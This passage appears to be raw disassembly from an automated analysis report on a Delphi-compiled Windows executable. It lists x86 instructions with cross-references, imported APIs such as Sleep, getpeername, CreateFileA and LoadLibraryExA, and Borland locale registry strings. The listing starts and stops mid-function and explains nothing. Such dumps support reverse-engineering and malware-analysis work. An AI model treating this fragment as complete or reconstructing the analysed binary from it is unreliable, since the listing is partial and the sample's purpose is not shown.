00429380 call dword ptr [ecx+1Ch]
00429383 mov eax, dword ptr [ebp-3Ch]
00429386 mov edx, 00000004h
0042938B pop ecx
0042938C call 004048D8h
00429391 mov edx, dword ptr [ebp-34h]
00429394 mov eax, dword ptr [ebp-04h]
00429397 mov ecx, dword ptr [eax]
00429399 call dword ptr [ecx+2Ch]
0042939C xor eax, eax
0042939E push ebp
0042939F push 004293F5h
004293A4 push dword ptr fs:[eax]
004293A7 mov dword ptr fs:[eax], esp
004293AA lea eax, dword ptr [ebp-40h]
004293AD push eax
004293AE lea edx, dword ptr [ebp-44h]
004293B1 mov eax, dword ptr [ebp-04h]
004293B4 mov ecx, dword ptr [eax]
004293B6 call dword ptr [ecx+1Ch]
004293B9 mov edx, dword ptr [ebp-44h]
004293BC mov eax, 004297B0h
004293C1 call 00404960h
004293C6 dec eax
004293C7 push eax
004293C8 lea edx, dword ptr [ebp-48h]
004293CB mov eax, dword ptr [ebp-04h]
004293CE mov ecx, dword ptr [eax]
004293D0 call dword ptr [ecx+1Ch]
004293D3 mov eax, dword ptr [ebp-48h]
004293D6 xor edx, edx
004293D8 pop ecx
004293D9 call 004048D8h
004293DE mov eax, dword ptr [ebp-40h]
004293E1 call 00422574h
004293E6 mov dword ptr [0042DA74h], eax
004293EB xor eax, eax
004293ED pop edx
004293EF pop ecx Count = 2
004293F0 mov dword ptr fs:[eax], edx
004293F3 jmp 00429406h
00429406 lea eax, dword ptr [ebp-4Ch] xrefs 004293F3
00429409 push eax
0042940A lea edx, dword ptr [ebp-50h]
0042940D mov eax, dword ptr [ebp-04h]
00429410 mov ecx, dword ptr [eax]
00429412 call dword ptr [ecx+1Ch]
00429415 mov eax, dword ptr [ebp-50h]
00429418 call 00404678h
0042941D mov ebx, eax
0042941F lea edx, dword ptr [ebp-54h]
00429422 mov eax, dword ptr [ebp-04h]
00429425 mov ecx, dword ptr [eax]
00429427 call dword ptr [ecx+1Ch]
0042942A mov edx, dword ptr [ebp-54h]
0042942D mov eax, 004297B0h
00429432 call 00404960h
00429437 sub ebx, eax
00429439 push ebx
0042943A lea edx, dword ptr [ebp-58h]
0042943D mov eax, dword ptr [ebp-04h]
00429440 mov ecx, dword ptr [eax]
00429442 call dword ptr [ecx+1Ch]
00429445 mov edx, dword ptr [ebp-58h]
00429448 mov eax, 004297B0h
0042944D call 00404960h
00429452 inc eax
00429453 push eax
00429454 lea edx, dword ptr [ebp-5Ch]
00429457 mov eax, dword ptr [ebp-04h]
0042945A mov ecx, dword ptr [eax]
0042945C call dword ptr [ecx+1Ch]
0042945F mov eax, dword ptr [ebp-5Ch]
00429462 pop edx
00429463 pop ecx
00429464 call 004048D8h
00429469 mov edx, dword ptr [ebp-4Ch]
0042946C mov eax, dword ptr [ebp-04h]
0042946F mov ecx, dword ptr [eax]
00429471 call dword ptr [ecx+2Ch]
00429474 xor eax, eax
00429476 mov dword ptr [ebp-18h], eax
00429479 lea eax, dword ptr [ebp-14h]
0042947C push eax
0042947D lea edx, dword ptr [ebp-60h]
00429480 mov eax, dword ptr [ebp-04h]
00429483 mov ecx, dword ptr [eax]
00429485 call dword ptr [ecx+1Ch]
00429488 mov eax, dword ptr [ebp-60h]
0042948B mov ecx, 00000001h
00429490 mov edx, dword ptr [ebp-18h]
00429493 call 004048D8h
00429498 jmp 004294BCh
0042949A inc dword ptr [ebp-18h] xrefs 004294C9, 004294D8, 004294E7, 004294F6, 00429505, 00429514, 00429523, 00429536, 00429549, 0042955C
0042949D lea eax, dword ptr [ebp-14h]
004294A0 push eax
004294A1 lea edx, dword ptr [ebp-64h]
004294A4 mov eax, dword ptr [ebp-04h]
004294A7 mov ecx, dword ptr [eax]
004294A9 call dword ptr [ecx+1Ch]
004294AC mov eax, dword ptr [ebp-64h]
004294AF mov ecx, 00000001h
004294B4 mov edx, dword ptr [ebp-18h]
004294B7 call 004048D8h
004294BC mov eax, dword ptr [ebp-14h] xrefs 00429498
004294BF mov edx, 004297BCh
004294C4 call 004047C4h
004294C9 je 0042949Ah
004294CB mov eax, dword ptr [ebp-14h]
004294CE mov edx, 004297C8h
004294D3 call 004047C4h
004294D8 je 0042949Ah
004294DA mov eax, dword ptr [ebp-14h]
004294DD mov edx, 004297D4h
004294E2 call 004047C4h
004294E7 je 0042949Ah
004294E9 mov eax, dword ptr [ebp-14h]
004294EC mov edx, 004297E0h
004294F1 call 004047C4h
004294F6 je 0042949Ah
004294F8 mov eax, dword ptr [ebp-14h]
004294FB mov edx, 004297ECh
00429500 call 004047C4h
00429505 je 0042949Ah
00429507 mov eax, dword ptr [ebp-14h]
0042950A mov edx, 004297F8h
0042950F call 004047C4h
00429514 je 0042949Ah
00429516 mov eax, dword ptr [ebp-14h]
00429519 mov edx, 00429804h
0042951E call 004047C4h
00429523 je 0042949Ah
00429529 mov eax, dword ptr [ebp-14h]
0042952C mov edx, 00429810h
00429531 call 004047C4h
00429536 je 0042949Ah
0042953C mov eax, dword ptr [ebp-14h]
0042953F mov edx, 0042981Ch
00429544 call 004047C4h
00429549 je 0042949Ah
0042954F mov eax, dword ptr [ebp-14h]
00429552 mov edx, 00429828h
00429557 call 004047C4h
0042955C je 0042949Ah
00429562 dec dword ptr [ebp-18h]
00429565 xor eax, eax
00429567 push ebp
00429568 push 004295A4h
0042956D push dword ptr fs:[eax]
00429570 mov dword ptr fs:[eax], esp
00429573 lea eax, dword ptr [ebp-68h]
00429576 push eax
00429577 lea edx, dword ptr [ebp-6Ch]
0042957A mov eax, dword ptr [ebp-04h]
0042957D mov ecx, dword ptr [eax]
0042957F call dword ptr [ecx+1Ch]
00429582 mov eax, dword ptr [ebp-6Ch]
00429585 mov ecx, dword ptr [ebp-18h]
00429588 xor edx, edx
0042958A call 004048D8h
0042958F mov eax, dword ptr [ebp-68h]
00429592 call 00422574h
00429597 mov dword ptr [ebp-08h], eax
0042959A xor eax, eax
0042959C pop edx
0042959E pop ecx Count = 2
0042959F mov dword ptr fs:[eax], edx
004295A2 jmp 004295B4h
004295B4 lea eax, dword ptr [ebp-10h] xrefs 004295A2
004295B7 push eax
004295B8 lea edx, dword ptr [ebp-70h]
004295BB mov eax, dword ptr [ebp-04h]
004295BE mov ecx, dword ptr [eax]
004295C0 call dword ptr [ecx+1Ch]
004295C3 mov eax, dword ptr [ebp-70h]
004295C6 call 00404678h
004295CB sub eax, dword ptr [ebp-18h]
004295CE sub eax, 02h
004295D1 push eax
004295D2 lea edx, dword ptr [ebp-74h]
004295D5 mov eax, dword ptr [ebp-04h]
004295D8 mov ecx, dword ptr [eax]
004295DA call dword ptr [ecx+1Ch]
004295DD mov eax, dword ptr [ebp-74h]
004295E0 mov edx, dword ptr [ebp-18h]
004295E3 inc edx
004295E4 pop ecx
004295E5 call 004048D8h
004295EA xor eax, eax
004295EC push ebp
004295ED push 0042970Eh
004295F2 push dword ptr fs:[eax]
004295F5 mov dword ptr fs:[eax], esp
004295F8 cmp dword ptr [ebp-10h], 00000000h
004295FC je 004296FAh
00429602 cmp dword ptr [0042DA74h], 00000000h
00429609 jng 004296FAh
0042960F cmp dword ptr [0042DA68h], 00000000h
00429616 jne 004296FAh
0042961C mov edx, dword ptr [ebp-10h]
0042961F mov eax, dword ptr [0042DA80h] 00000000
00429624 mov ecx, dword ptr [eax]
00429626 call dword ptr [ecx+2Ch]
00429629 mov eax, dword ptr [0042DA80h] 00000000
0042962E mov edx, dword ptr [eax]
00429630 call dword ptr [edx+14h]
00429633 mov dword ptr [0042DA70h], eax
00429638 mov eax, dword ptr [0042DA80h] 00000000
0042963D mov edx, dword ptr [eax]
0042963F call dword ptr [edx+14h]
00429642 test eax, eax
00429644 jng 004296EEh
0042964A xor eax, eax
0042964C mov dword ptr [0042DA68h], eax
00429651 mov dword ptr [0042DA78h], 00000001h
0042965B xor eax, eax
0042965D mov dword ptr [0042DA7Ch], eax
00429662 mov eax, dword ptr [0042DA6Ch] 00000000
00429667 cmp eax, dword ptr [0042DA74h] 00000000
0042966D jnl 00429704h
00429673 xor eax, eax xrefs 004296EA
00429675 push ebp
00429676 push 004296C9h
0042967B push dword ptr fs:[eax]
0042967E mov dword ptr fs:[eax], esp
00429681 cmp dword ptr [0042DA7Ch], 01h
00429688 jne 0042969Ah
0042968A push 00000001h xrefs 00429698
0042968C call 00421B84h
00429691 cmp dword ptr [0042DA7Ch], 01h
00429698 je 0042968Ah
0042969A mov dword ptr [0042DA7Ch], 00000001h xrefs 00429688
004296A4 xor ecx, ecx
004296A6 mov dl, 01h
004296A8 mov eax, dword ptr [00421B0Ch] 00421B58
004296AD call 00413184h
004296B2 mov edx, dword ptr [0042DA6Ch] 00000000
004296B8 mov dword ptr [0042CAC8h+edx*4], eax
004296BF xor eax, eax
004296C1 pop edx
004296C3 pop ecx Count = 2
004296C4 mov dword ptr fs:[eax], edx
004296C7 jmp 004296D9h
004296D9 inc dword ptr [0042DA6Ch] xrefs 004296C7
004296DF mov eax, dword ptr [0042DA6Ch] 00000000
004296E4 cmp eax, dword ptr [0042DA74h] 00000000
004296EA jl 00429673h
004296EC jmp 00429704h
004296EE mov dword ptr [0042DA68h], 00000001h xrefs 00429644
004296F8 jmp 00429704h
004296FA mov dword ptr [0042DA68h], 00000001h xrefs 004295FC, 00429609, 00429616
00429704 xor eax, eax xrefs 004296F8, 0042966D, 004296EC
00429706 pop edx
00429708 pop ecx Count = 2
00429709 mov dword ptr fs:[eax], edx
0042970C jmp 00429734h
00429724 mov dword ptr [0042DA68h], 00000001h xrefs 004292B0
0042972E mov eax, dword ptr [ebp-0Ch]
00429731 mov dword ptr [ebp-08h], eax
00429734 mov dl, 01h xrefs 0042970C, 00429722
00429736 mov eax, dword ptr [ebp-04h]
00429739 mov ecx, dword ptr [eax]
0042973B call dword ptr [ecx-04h]
0042973E xor eax, eax
00429740 pop edx
00429742 pop ecx Count = 2
00429743 mov dword ptr fs:[eax], edx
00429746 jmp 00429752h
00429752 imul eax, dword ptr [ebp-08h], 000003E7h xrefs 00429746
00429759 push eax
0042975A call 00421B84h Sleep@KERNEL32.DLL (Hidden Import)
0042975F jmp 00429260h
Address Instruction Meta Information
004026C8 push ebx xrefs 004043A1, 004044AC, 00405186, 00407BD0, 004057A4, 004036AA, 0040726A
004026C9 test eax, eax
004026CB jle 004026E2h
004026CD call dword ptr [0042B044h]
004026D3 mov ebx, eax
004026D5 test ebx, ebx
004026D7 jne 004026E4h
004026D9 mov al, 01h
004026DB call 004027E4h
004026E0 jmp 004026E4h
004026E2 xor ebx, ebx xrefs 004026CB
004026E4 mov eax, ebx xrefs 004026D7, 004026E0
004026E6 pop ebx
004026E7 ret function end
APIs
  • QueryPerformanceCounter.KERNEL32, ref: 00402A20
  • GetTickCount.KERNEL32, ref: 00402A34
Address Instruction Meta Information
00402A1C add esp, FFFFFFF8h xrefs 0042925B, 00429DB1
00402A1F push esp
00402A20 call 00401308h QueryPerformanceCounter@KERNEL32.DLL (Hidden Import)
00402A25 test eax, eax
00402A27 je 00402A34h
00402A29 mov eax, dword ptr [esp]
00402A2C mov dword ptr [0042B008h], eax
00402A31 pop ecx
00402A32 pop edx
00402A33 ret function end
00402A34 call 00401310h GetTickCount@KERNEL32.DLL (Hidden Import) xrefs 00402A27
00402A39 mov dword ptr [0042B008h], eax
00402A3E pop ecx
00402A3F pop edx
00402A40 ret function end
APIs
  • LoadStringA.USER32, ref: 00405DB1
Address Instruction Meta Information
00405D80 push ebx xrefs 0040A9F3, 0040A1AE, 0040AB91, 0040ABBC, 0040AD35, 0040AE4D, 0040ADF1, 0040AD26, 0040AF20, 0040A99E, 0040411A, 0040D387, 0040D41B, 0040D477, 0040D50B, 0040D567, 0040D697, 0040D6BD, 0040D709, 0040D72F, 0040D7A4, 0040D671, 0040D641, 0040D6E3, 0040D752, 0040D84F, 0041067A, 00410E85
00405D81 push esi
00405D82 add esp, FFFFFC00h
00405D88 mov esi, edx
00405D8A mov ebx, eax
00405D8C test ebx, ebx
00405D8E je 00405DCDh
00405D90 cmp dword ptr [ebx+04h], 00010000h
00405D97 jnl 00405DC3h
00405D99 push 00000400h
00405D9E lea eax, dword ptr [esp+04h]
00405DA2 push eax
00405DA3 mov eax, dword ptr [ebx+04h]
00405DA6 push eax
00405DA7 mov eax, dword ptr [ebx]
00405DA9 mov eax, dword ptr [eax]
00405DAB call 00405328h
00405DB0 push eax
00405DB1 call 00401288h LoadStringA@USER32.DLL (Hidden Import)
00405DB6 mov ecx, eax
00405DB8 mov edx, esp
00405DBA mov eax, esi
00405DBC call 004044CCh
00405DC1 jmp 00405DCDh
00405DC3 mov eax, esi xrefs 00405D97
00405DC5 mov edx, dword ptr [ebx+04h]
00405DC8 call 004045D4h
00405DCD add esp, 00000400h xrefs 00405D8E, 00405DC1
00405DD3 pop esi
00405DD4 pop ebx
00405DD5 ret function end
Address Instruction Meta Information
00404064 push ebp xrefs 004040FE
00404065 mov ebp, esp
00404067 push ebx
00404068 push esi
00404069 push edi
0040406A mov eax, dword ptr [0042C638h] 00429CC0
0040406F test eax, eax
00404071 je 004040BEh
00404073 mov esi, dword ptr [eax]
00404075 xor ebx, ebx
00404077 mov edi, dword ptr [eax+04h]
0040407A xor edx, edx
0040407C push ebp
0040407D push 004040AAh
00404082 push dword ptr fs:[edx]
00404085 mov dword ptr fs:[edx], esp
00404088 cmp esi, ebx
0040408A jle 004040A0h
0040408C mov eax, dword ptr [edi+ebx*8] xrefs 0040409E
0040408F inc ebx
00404090 mov dword ptr [0042C63Ch], ebx
00404096 test eax, eax
00404098 je 0040409Ch
0040409A call eax
0040409C cmp esi, ebx xrefs 00404098
0040409E jnle 0040408Ch
004040A0 xor eax, eax xrefs 0040408A
004040A2 pop edx
004040A4 pop ecx Count = 2
004040A5 mov dword ptr fs:[eax], edx
004040A8 jmp 004040BEh
004040BE pop edi xrefs 00404071, 004040A8
004040BF pop esi
004040C0 pop ebx
004040C1 pop ebp
004040C2 ret function end
APIs
  • GetLocaleInfoA.KERNEL32, ref: 0040A12A
  • EnumCalendarInfoA.KERNEL32, ref: 0040A3E7
Address Instruction Meta Information
0040A394 push ebp xrefs 0040B7F1
0040A395 mov ebp, esp
0040A397 push 00000000h
0040A399 push esi
0040A39A xor eax, eax
0040A39C push ebp
0040A39D push 0040A42Bh
0040A3A2 push dword ptr fs:[eax]
0040A3A5 mov dword ptr fs:[eax], esp
0040A3A8 lea eax, dword ptr [ebp-04h]
0040A3AB push eax
0040A3AC call 004061ECh
0040A3B1 mov ecx, 0040A440h
0040A3B6 mov edx, 0000100Bh
0040A3BB call 0040A10Ch
0040A3C0 mov eax, dword ptr [ebp-04h]
0040A3C3 mov edx, 00000001h
0040A3C8 call 00407608h
0040A3CD mov esi, eax
0040A3CF mov eax, esi
0040A3D1 add eax, FFFFFFFDh
0040A3D4 sub eax, 03h
0040A3D7 jnc 0040A415h
0040A3D9 push 00000004h
0040A3DB push esi
0040A3DC call 004061ECh
0040A3E1 push eax
0040A3E2 push 0040A2E0h
0040A3E7 call 00406124h EnumCalendarInfoA@KERNEL32.DLL (Hidden Import)
0040A3EC mov edx, 00000007h
0040A3F1 mov eax, 0042C764h
0040A3F6 mov dword ptr [eax], FFFFFFFFh xrefs 0040A400
0040A3FC add eax, 04h
0040A3FF dec edx
0040A400 jne 0040A3F6h
0040A402 push 00000003h
0040A404 push esi
0040A405 call 004061ECh
0040A40A push eax
0040A40B push 0040A31Ch
0040A410 call 00406124h
0040A415 xor eax, eax xrefs 0040A3D7
0040A417 pop edx
0040A419 pop ecx Count = 2
0040A41A mov dword ptr fs:[eax], edx
0040A41D push 0040A432h
0040A422 lea eax, dword ptr [ebp-04h] xrefs 0040A430
0040A425 call 004043DCh
0040A42A ret function end
APIs
  • GetModuleHandleA.KERNEL32, ref: 00405381
  • GetProcAddress.KERNEL32, ref: 00405392
  • lstrcpyn.KERNEL32, ref: 00405426
  • FindFirstFileA.KERNEL32, ref: 0040546E
  • FindClose.KERNEL32, ref: 0040547B
  • lstrlen.KERNEL32, ref: 00405487
  • GetModuleFileNameA.KERNEL32, ref: 00405538
  • GetThreadLocale.KERNEL32, ref: 00405645
  • GetLocaleInfoA.KERNEL32, ref: 0040564B
  • LoadLibraryExA.KERNEL32, ref: 00405705
Strings
  • Software\Borland\Locales, va: 0040574C
  • Software\Borland\Delphi\Locales, va: 00405768
Address Instruction Meta Information
0040551C push ebp xrefs 00405307
0040551D mov ebp, esp
0040551F add esp, FFFFFEE0h
00405525 push ebx
00405526 push esi
00405527 mov dword ptr [ebp-04h], eax
0040552A push 00000105h
0040552F lea eax, dword ptr [ebp-0000011Dh]
00405535 push eax
00405536 push 00000000h
00405538 call 00401258h GetModuleFileNameA@KERNEL32.DLL (Hidden Import)
0040553D mov byte ptr [ebp-12h], 00000000h
00405541 lea eax, dword ptr [ebp-08h]
00405544 push eax
00405545 push 000F0019h
0040554A push 00000000h
0040554C push 0040574Ch ASCII "Software\Borland\Locales"
00405551 push 80000001h
00405556 call 004012B0h
0040555B test eax, eax
0040555D je 0040559Fh
0040555F lea eax, dword ptr [ebp-08h]
00405562 push eax
00405563 push 000F0019h
00405568 push 00000000h
0040556A push 0040574Ch ASCII "Software\Borland\Locales"
0040556F push 80000002h
00405574 call 004012B0h
00405579 test eax, eax
0040557B je 0040559Fh
0040557D lea eax, dword ptr [ebp-08h]
00405580 push eax
00405581 push 000F0019h
00405586 push 00000000h
00405588 push 00405768h ASCII "Software\Borland\Delphi\Locales"
0040558D push 80000001h
00405592 call 004012B0h
00405597 test eax, eax
00405599 jne 00405628h
0040559F xor eax, eax xrefs 0040555D, 0040557B
004055A1 push ebp
004055A2 push 00405621h
004055A7 push dword ptr fs:[eax]
004055AA mov dword ptr fs:[eax], esp
004055AD mov dword ptr [ebp-18h], 00000005h
004055B4 lea eax, dword ptr [ebp-0000011Dh]
004055BA mov edx, 00000105h
004055BF call 00405364h
004055C4 lea eax, dword ptr [ebp-18h]
004055C7 push eax
004055C8 lea eax, dword ptr [ebp-12h]
004055CB push eax
004055CE push 00000000h Count = 2
004055D0 lea eax, dword ptr [ebp-0000011Dh]
004055D6 push eax
004055D7 mov eax, dword ptr [ebp-08h]
004055DA push eax
004055DB call 004012B8h
004055E0 test eax, eax
004055E2 je 00405606h
004055E4 lea eax, dword ptr [ebp-18h]
004055E7 push eax
004055E8 lea eax, dword ptr [ebp-12h]
004055EB push eax
004055EE push 00000000h Count = 2
004055F0 push 00405788h
004055F5 mov eax, dword ptr [ebp-08h]
004055F8 push eax
004055F9 call 004012B8h
004055FE test eax, eax
00405600 je 00405606h
00405602 mov byte ptr [ebp-12h], 00000000h
00405606 mov byte ptr [ebp-0Eh], 00000000h xrefs 004055E2, 00405600
0040560A xor eax, eax
0040560C pop edx
0040560E pop ecx Count = 2
0040560F mov dword ptr fs:[eax], edx
00405612 push 00405628h
00405617 mov eax, dword ptr [ebp-08h] xrefs 00405626
0040561A push eax
0040561B call 004012A8h
00405620 ret function end
00405628 push 00000105h xrefs 00405599
0040562D mov eax, dword ptr [ebp-04h]
00405630 push eax
00405631 lea eax, dword ptr [ebp-0000011Dh]
00405637 push eax
00405638 call 00401290h
0040563D push 00000005h
0040563F lea eax, dword ptr [ebp-0Dh]
00405642 push eax
00405643 push 00000003h
00405645 call 00401278h GetThreadLocale@KERNEL32.DLL (Hidden Import)
0040564A push eax
0040564B call 00401250h GetLocaleInfoA@KERNEL32.DLL (Hidden Import)
00405650 xor esi, esi
00405652 cmp byte ptr [ebp-0000011Dh], 00000000h
00405659 je 00405742h
0040565F cmp byte ptr [ebp-0Dh], 00000000h
00405663 jne 0040566Fh
00405665 cmp byte ptr [ebp-12h], 00000000h
00405669 je 00405742h
0040566F lea eax, dword ptr [ebp-0000011Dh] xrefs 00405663
00405675 push eax
00405676 call 00401298h
0040567B mov ebx, eax
0040567D lea eax, dword ptr [ebp-0000011Dh]
00405683 add ebx, eax
00405685 jmp 00405688h
00405687 dec ebx xrefs 00405695
00405688 cmp byte ptr [ebx], 0000002Eh xrefs 00405685
0040568B je 00405697h
0040568D lea eax, dword ptr [ebp-0000011Dh]
00405693 cmp ebx, eax
00405695 jne 00405687h
00405697 lea eax, dword ptr [ebp-0000011Dh] xrefs 0040568B
0040569D cmp ebx, eax
0040569F je 00405742h
004056A5 inc ebx
004056A6 cmp byte ptr [ebp-12h], 00000000h
004056AA je 004056D4h
004056AC mov edx, ebx
004056AE sub edx, eax
004056B0 mov eax, 00000105h
004056B5 sub eax, edx
004056B7 push eax
004056B8 lea eax, dword ptr [ebp-12h]
004056BB push eax
004056BC push ebx
004056BD call 00401290h
004056C2 push 00000002h
004056C4 push 00000000h
004056C6 lea eax, dword ptr [ebp-0000011Dh]
004056CC push eax
004056CD call 00401280h
004056D2 mov esi, eax
004056D4 test esi, esi xrefs 004056AA
004056D6 jne 00405742h
004056D8 cmp byte ptr [ebp-0Dh], 00000000h
004056DC je 00405742h
004056DE lea eax, dword ptr [ebp-0000011Dh]
004056E4 mov edx, ebx
004056E6 sub edx, eax
004056E8 mov eax, 00000105h
004056ED sub eax, edx
004056EF push eax
004056F0 lea eax, dword ptr [ebp-0Dh]
004056F3 push eax
004056F4 push ebx
004056F5 call 00401290h
004056FA push 00000002h
004056FC push 00000000h
004056FE lea eax, dword ptr [ebp-0000011Dh]
00405704 push eax
00405705 call 00401280h LoadLibraryExA@KERNEL32.DLL (Hidden Import)
0040570A mov esi, eax
0040570C test esi, esi
0040570E jne 00405742h
00405710 mov byte ptr [ebp-0Bh], 00000000h
00405714 lea eax, dword ptr [ebp-0000011Dh]
0040571A mov edx, ebx
0040571C sub edx, eax
0040571E mov eax, 00000105h
00405723 sub eax, edx
00405725 push eax
00405726 lea eax, dword ptr [ebp-0Dh]
00405729 push eax
0040572A push ebx
0040572B call 00401290h
00405730 push 00000002h
00405732 push 00000000h
00405734 lea eax, dword ptr [ebp-0000011Dh]
0040573A push eax
0040573B call 00401280h
00405740 mov esi, eax
00405742 mov eax, esi xrefs 00405659, 0040569F, 004056D6, 004056DC, 0040570E, 00405669
00405744 pop esi
00405745 pop ebx
00405746 mov esp, ebp
00405748 pop ebp
00405749 ret function end
APIs
  • getpeername.WS2_32, ref: 00413A55
Address Instruction Meta Information
00413A38 push ebx xrefs 004185D5
00413A39 push esi
00413A3A push ecx
00413A3B mov ebx, edx
00413A3D mov esi, eax
00413A3F mov dword ptr [esp], 0000001Ch
00413A46 mov eax, ebx
00413A48 xor ecx, ecx
00413A4A mov edx, dword ptr [esp]
00413A4D call 00403030h
00413A52 push esp
00413A53 push ebx
00413A54 push esi
00413A55 call dword ptr [0042B430h] getpeername@WS2_32.DLL (Hidden Import)
00413A5B pop edx
00413A5C pop esi
00413A5D pop ebx
00413A5E ret function end
APIs
  • GetModuleHandleA.KERNEL32, ref: 00406044
Address Instruction Meta Information
00406038 push ebx xrefs 00429D9E
00406039 mov ebx, eax
0040603B xor eax, eax
0040603D mov dword ptr [0042B0C4h], eax
00406042 push 00000000h
00406044 call 00405F74h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00406049 mov dword ptr [0042C660h], eax
0040604E mov eax, dword ptr [0042C660h] 00400000
00406053 mov dword ptr [0042B0CCh], eax
00406058 xor eax, eax
0040605A mov dword ptr [0042B0D0h], eax
0040605F xor eax, eax
00406061 mov dword ptr [0042B0D4h], eax
00406066 call 0040602Ch
0040606B mov edx, 0042B0C8h
00406070 mov eax, ebx
00406072 call 004040C4h
00406077 pop ebx
00406078 ret function end
APIs
  • CreateFileA.KERNEL32, ref: 0040312F
Address Instruction Meta Information
00403094 push ebx xrefs 0040318A, 00403195
00403095 push esi
00403096 push edi
00403097 mov esi, edx
00403099 mov edi, ecx
0040309B xor edx, edx
0040309D mov ebx, eax
0040309F mov dx, word ptr [eax+04h]
004030A3 sub edx, 0000D7B0h
004030A9 je 004030C0h
004030AB cmp edx, 03h
004030AE ja 00403156h
004030B4 call dword ptr [ebx+24h]
004030B7 test eax, eax
004030B9 je 004030C0h
004030BB call 00402810h
004030C0 mov word ptr [ebx+04h], D7B3h xrefs 004030A9, 004030B9
004030C6 mov dword ptr [ebx+08h], esi
004030C9 mov dword ptr [ebx+24h], 0040306Ch
004030D0 mov dword ptr [ebx+1Ch], 00402AC0h
004030D7 cmp byte ptr [ebx+48h], 00000000h
004030DB je 0040313Dh
004030DD mov eax, C0000000h
004030E2 mov dl, byte ptr [0042B00Ch] 02
004030E8 and edx, 70h
004030EB shr edx, 02h
004030EE mov edx, dword ptr [edx+0042B06Ch]
004030F4 mov ecx, 00000002h
004030F9 sub edi, 03h
004030FC je 0040311Fh
004030FE mov ecx, 00000003h
00403103 inc edi
00403104 je 0040311Fh
00403106 mov eax, 40000000h
0040310B inc edi
0040310C mov word ptr [ebx+04h], D7B2h
00403112 je 0040311Fh
00403114 mov eax, 80000000h
00403119 mov word ptr [ebx+04h], D7B1h
0040311F push 00000000h xrefs 004030FC, 00403104, 00403112
00403121 push 00000080h
00403126 push ecx
00403127 push 00000000h
00403129 push edx
0040312A push eax
0040312B lea eax, dword ptr [ebx+48h]
0040312E push eax
0040312F call 004011A8h CreateFileA@KERNEL32.DLL (Hidden Import)
00403134 cmp eax, FFFFFFFFh xrefs 00403154
00403137 je 0040315Dh
00403139 mov dword ptr [ebx], eax
0040313B jmp 0040316Dh
0040313D mov dword ptr [ebx+24h], 00402AC0h xrefs 004030DB
00403144 cmp edi, 03h
00403147 je 0040314Dh
00403149 push FFFFFFF6h
0040314B jmp 0040314Fh
0040314D push FFFFFFF5h xrefs 00403147
0040314F call 004011C0h xrefs 0040314B
00403154 jmp 00403134h
00403156 mov eax, 00000066h xrefs 004030AE
0040315B jmp 00403168h
0040315D mov word ptr [ebx+04h], D7B0h xrefs 00403137
00403163 call 00401248h
00403168 call 00402810h xrefs 0040315B
0040316D pop edi xrefs 0040313B
0040316E pop esi
0040316F pop ebx
00403170 ret function end
APIs
  • CharNextA.USER32, ref: 00405353
  • GetModuleHandleA.KERNEL32, ref: 00405381
  • GetProcAddress.KERNEL32, ref: 00405392
  • lstrcpyn.KERNEL32, ref: 00405426
  • FindFirstFileA.KERNEL32, ref: 0040546E
  • FindClose.KERNEL32, ref: 0040547B
  • lstrlen.KERNEL32, ref: 00405487
Strings
  • kernel32.dll, va: 004054F8
  • GetLongPathNameA, va: 00405508
Address Instruction Meta Information
00405364 push ebp xrefs 004055BF
00405365 mov ebp, esp
00405367 add esp, FFFFFDB0h
0040536D push ebx
0040536E push esi
0040536F push edi
00405370 mov dword ptr [ebp-08h], edx
00405373 mov dword ptr [ebp-04h], eax
00405376 mov eax, dword ptr [ebp-04h]
00405379 mov dword ptr [ebp-0Ch], eax
0040537C push 004054F8h ASCII "kernel32.dll"
00405381 call 00401260h GetModuleHandleA@KERNEL32.DLL (Hidden Import)
00405386 mov esi, eax
00405388 test esi, esi
0040538A je 004053CCh
0040538C push 00405508h ASCII "GetLongPathNameA"
00405391 push esi
00405392 call 00401268h GetProcAddress@KERNEL32.DLL (Import)
00405397 mov ebx, eax
00405399 test ebx, ebx
0040539B je 004053CCh
0040539D push 00000105h
004053A2 lea eax, dword ptr [ebp-0000024Fh]
004053A8 push eax
004053A9 mov eax, dword ptr [ebp-04h]
004053AC push eax
004053AD call ebx
004053AF test eax, eax
004053B1 je 004053CCh
004053B3 mov eax, dword ptr [ebp-08h]
004053B6 push eax
004053B7 lea eax, dword ptr [ebp-0000024Fh]
004053BD push eax
004053BE mov eax, dword ptr [ebp-04h]
004053C1 push eax
004053C2 call 00401290h
004053C7 jmp 004054EEh
004053CC mov eax, dword ptr [ebp-04h] xrefs 0040538A, 0040539B, 004053B1
004053CF cmp byte ptr [eax], 0000005Ch
004053D2 jne 0040540Ch
004053D4 mov eax, dword ptr [ebp-04h]
004053D7 cmp byte ptr [eax+01h], 0000005Ch
004053DB jne 004054EEh
004053E1 mov eax, dword ptr [ebp-04h]
004053E4 add eax, 02h
004053E7 call 00405350h
004053EC mov esi, eax
004053EE cmp byte ptr [esi], 00000000h
004053F1 je 004054EEh
004053F7 lea eax, dword ptr [esi+01h]
004053FA call 00405350h
004053FF mov esi, eax
00405401 cmp byte ptr [esi], 00000000h
00405404 je 004054EEh
0040540A jmp 00405412h
0040540C mov esi, dword ptr [ebp-04h] xrefs 004053D2
0040540F add esi, 02h
00405412 mov ebx, esi xrefs 0040540A
00405414 sub ebx, dword ptr [ebp-04h]
00405417 lea eax, dword ptr [ebx+01h]
0040541A push eax
0040541B mov eax, dword ptr [ebp-04h]
0040541E push eax
0040541F lea eax, dword ptr [ebp-0000024Fh]
00405425 push eax
00405426 call 00401290h lstrcpyn@KERNEL32.DLL (Hidden Import)
0040542B jmp 004054D1h
00405430 lea eax, dword ptr [esi+01h] xrefs 004054D4
00405433 call 00405350h
00405438 mov edi, eax
0040543A mov eax, edi
0040543C sub eax, esi
0040543E mov edx, eax
00405440 add edx, ebx
00405442 inc edx
00405443 cmp edx, 00000105h
00405449 jg 004054EEh
0040544F inc eax
00405450 push eax
00405451 push esi
00405452 lea eax, dword ptr [ebp-0000024Fh]
00405458 add eax, ebx
0040545A push eax
0040545B call 00401290h
00405460 lea eax, dword ptr [ebp-0000014Ah]
00405466 push eax
00405467 lea eax, dword ptr [ebp-0000024Fh]
0040546D push eax
0040546E call 00401230h FindFirstFileA@KERNEL32.DLL (Hidden Import)
00405473 mov esi, eax
00405475 cmp esi, FFFFFFFFh
00405478 je 004054EEh
0040547A push esi
0040547B call 00401228h FindClose@KERNEL32.DLL (Hidden Import)
00405480 lea eax, dword ptr [ebp-0000011Eh]
00405486 push eax
00405487 call 00401298h lstrlen@KERNEL32.DLL (Hidden Import)
0040548C lea edx, dword ptr [ebx+01h]
0040548F add eax, edx
00405491 inc eax
